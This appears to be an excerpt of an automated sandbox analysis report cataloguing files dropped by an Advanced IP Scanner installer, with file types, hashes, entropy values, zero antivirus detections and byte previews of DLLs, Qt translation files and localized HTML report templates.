                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):6.97464085764015
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
                                                                                                                      MD5:3B3BD0AD4FEA16AB58FCAEAE4629879C
                                                                                                                      SHA1:EB175F53640FB8AC4028A7657BBF48823A535677
                                                                                                                      SHA-256:DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
                                                                                                                      SHA-512:F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28545
                                                                                                                      Entropy (8bit):4.714189994601161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
                                                                                                                      MD5:2AADC93C38DBB7E1D048B05B63133217
                                                                                                                      SHA1:66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
                                                                                                                      SHA-256:A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
                                                                                                                      SHA-512:63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........[*...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A*..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H..*.y.....*.y.....*.%..%V.*.0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19648
                                                                                                                      Entropy (8bit):6.961849079425489
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
                                                                                                                      MD5:8F8A47617DFD829A63E3EC4AFF2718D9
                                                                                                                      SHA1:1D7DC26BB9C78C4499514FB3529B3478AECF7340
                                                                                                                      SHA-256:6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
                                                                                                                      SHA-512:D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27444
                                                                                                                      Entropy (8bit):4.672755214321859
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
                                                                                                                      MD5:5323FC9E0D0110FE16F649B91167E604
                                                                                                                      SHA1:88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
                                                                                                                      SHA-256:660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
                                                                                                                      SHA-512:526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........W(...;...N...;.......;.......;.. ....;..B6...O..Y....[..U....^.......^..Q...(5...w..G.......H,..N...K...>...N:......V...C..._...[2......(T......N....y..Oa.......}.......V......V....t..)....t..O....t..Y......?....j......5t......@...AG..H5..W...f.../.......D:...................~..1....`..6....e..Y.......Y5......... =...EO.*.y.....*.y.....*.%..$>.*.0..$g.+.......+.......+....H.+......+....&..G.......G....*G.H0...Ye.Hw9...7.Hw9...'.I....'..J6......J6......J6....h.J6...G..LD......L.b..Y..M.S..?..R.......V..../=.Wi...X..W.T.....Z.|..P..[f3..T..gc......w0K..Fv..H...%.......Z....T......."..3....~..5... d..D....T..-{..2....=......X.......^c.9.E..>..L.#..a..M$o.....e.......l8...5K...^..H...I....j......Az......QW......W...>...]..>......3......l...I~......8..5.l..]i.AV...'..y....V/...0..R&......Q.......W...tb..42...............K......R.......<.......M~.(....Q..1V...(..R....0..W.<..]..f.~..!.......3 ..1........^..4....5...w......t...c..E..;6..._{.q.J..NL..I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1155
                                                                                                                      Entropy (8bit):4.803303336966706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
                                                                                                                      MD5:27C167C1E5624DC7F4D0256ABAA8632F
                                                                                                                      SHA1:7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
                                                                                                                      SHA-256:E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
                                                                                                                      SHA-512:C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21184
                                                                                                                      Entropy (8bit):6.98505637818331
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                                                      MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                                                      SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                                                      SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                                                      SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1173
                                                                                                                      Entropy (8bit):4.837006163390497
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoSb9bqsuShXqRHRM9BHBl0Kt5RGDhC+6ReEhyv:Hpb9bqsRhXqRHwBhl0U2Dw+As
                                                                                                                      MD5:3DF24E832E07A361EE154A0635DF60F7
                                                                                                                      SHA1:B02EDAA0C6B997830669B6FF1A3C6FB43331CFD3
                                                                                                                      SHA-256:7A0B4383F55B6D2D52869CD50951FDE5ABE94208DE076161D12F7702537F37EA
                                                                                                                      SHA-512:C8E81AFCF8E26086E83E410F158C46336CDB039014FDB1686F5E039032E044B87EBFEF1E9E71CBA34FA6D0F24EFE914A4AE180A61CB80E619C18BBE1D6ACAD2C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Estado:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usuario:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Fecha:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servicio t.cnico</center></b></td><td><b><center>M
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1147
                                                                                                                      Entropy (8bit):4.784372507341765
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
                                                                                                                      MD5:04C416BEC9FE7DEC52E2F368353FF1F9
                                                                                                                      SHA1:DB86325EDF8EED3639A26ED279A00EBC9208ED1E
                                                                                                                      SHA-256:10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
                                                                                                                      SHA-512:4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1151016
                                                                                                                      Entropy (8bit):6.482547207070433
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
                                                                                                                      MD5:ED04DAB88E70661E4980A284B0DF6A0C
                                                                                                                      SHA1:C1499360A68FDC12013A6CBB35C05A3098E95F41
                                                                                                                      SHA-256:9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
                                                                                                                      SHA-512:E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1179
                                                                                                                      Entropy (8bit):4.8880159035742965
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
                                                                                                                      MD5:1588431C36A3112355553A6967E3405E
                                                                                                                      SHA1:0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
                                                                                                                      SHA-256:69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
                                                                                                                      SHA-512:F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20672
                                                                                                                      Entropy (8bit):6.979229086130751
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
                                                                                                                      MD5:AB8734C2328A46E7E9583BEFEB7085A2
                                                                                                                      SHA1:B4686F07D1217C77EB013153E6FF55B34BE0AF65
                                                                                                                      SHA-256:921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
                                                                                                                      SHA-512:FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28507
                                                                                                                      Entropy (8bit):4.623752380391833
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:+SMpoU+mEzzXQeqk2clHV//QY8BjefWOUxDid8KeDO33wE4:e6DmEzzX/qk2c9V//QZevUmk
                                                                                                                      MD5:C576730007E97DD3B8F3C46FFF0F6DDD
                                                                                                                      SHA1:311DF6FDB52905E3FFA80494FE0E1E7534060155
                                                                                                                      SHA-256:F01DC02F68D88631535D8010960C2F306FCF07FC69F4A8113BF1A1D70130D001
                                                                                                                      SHA-512:427751E2D8A84878837DEE345A22CC7AA3ADB0E8B40113C39E61038444121700142F56B73536FCF9AC5D150253277390AA9BEC08B29C408089C9C04E932BE89C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........[,...;.......;.......;.......;..!....;..E....O..^....[..Y....^..1....^..U...(5......G.......H,..R~..K...A...N:......V...F..._..._P......).......R....y..S.......................[....t..+k...t..S....t..]......B....j......5t......@...D...H5..[...f...1I......G................!...~..4T...`..9"...e..])......]Q.......N. =...H..*.y.....*.y...Q.*.%..%..*.0..%..+.....Y.+.......+......+......+....'].G.... ..G....+..H0...]..Hw9.....Hw9.....I....)Z.J6......J6.... .J6......J6...K..LD......L.b..]..M.S..C..R.......V....1q.Wi...\..W.T.....Z.|..T[.[f3..X8.gc....^.w0K..J...H...&i......^....T...c..."..6Z...~..8... d..H3...T../Q..2...........\:......b..9.E..B,.L.#..e-.M$o.....e.......l8...8S...^..K...I...........D.......U9......[...>......>......3..0...l...M,......;..5.l..a..AV...)..y....Z3...0..V.......T.......[...tb..7$.......)..............V.......?.......Q..(....U..1V...*@.R....35.W.<..b..f.~..".......5...1....E...^..7....5...S..........c..H..;6...c..q.J..Q...I....O..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3329597
                                                                                                                      Entropy (8bit):6.563292325267208
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PK:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334S
                                                                                                                      MD5:3EAAE4BAD7C2BD8319CDCDFCAAC03B7E
                                                                                                                      SHA1:3FA168131A590D0EB7C80B6F321304A2070985E6
                                                                                                                      SHA-256:938C1F61125871F4A0B8F2382F29C420443DD755F01A596996E444A360CA21A3
                                                                                                                      SHA-512:98D76D607D8B2D44B53B8926BD1C58E7249D63C80066C34D420D0CCA3A9190072AAD21A4C073E12AE4F70086F8516621B6D2B3170D9519C1F51EB46B888CEAC4
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):6.97908669425612
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
                                                                                                                      MD5:2886C75F8B9D3EFDF315C44B52847AEE
                                                                                                                      SHA1:4FC75E39493B356F1F219798E3738DBC764281E4
                                                                                                                      SHA-256:3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
                                                                                                                      SHA-512:2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1153
                                                                                                                      Entropy (8bit):4.877089271030429
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
                                                                                                                      MD5:1D0D5C190B173CB0BED10C8B2E0F9697
                                                                                                                      SHA1:83C10675F5A010668F4A278115BBC120F70EC99B
                                                                                                                      SHA-256:F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
                                                                                                                      SHA-512:94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1151
                                                                                                                      Entropy (8bit):4.790118218856679
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
                                                                                                                      MD5:5AD712B9C416EE21623D620AB6019FB4
                                                                                                                      SHA1:51DF096A58D6DF2A7CE33E22511C671883F2228C
                                                                                                                      SHA-256:38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
                                                                                                                      SHA-512:608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
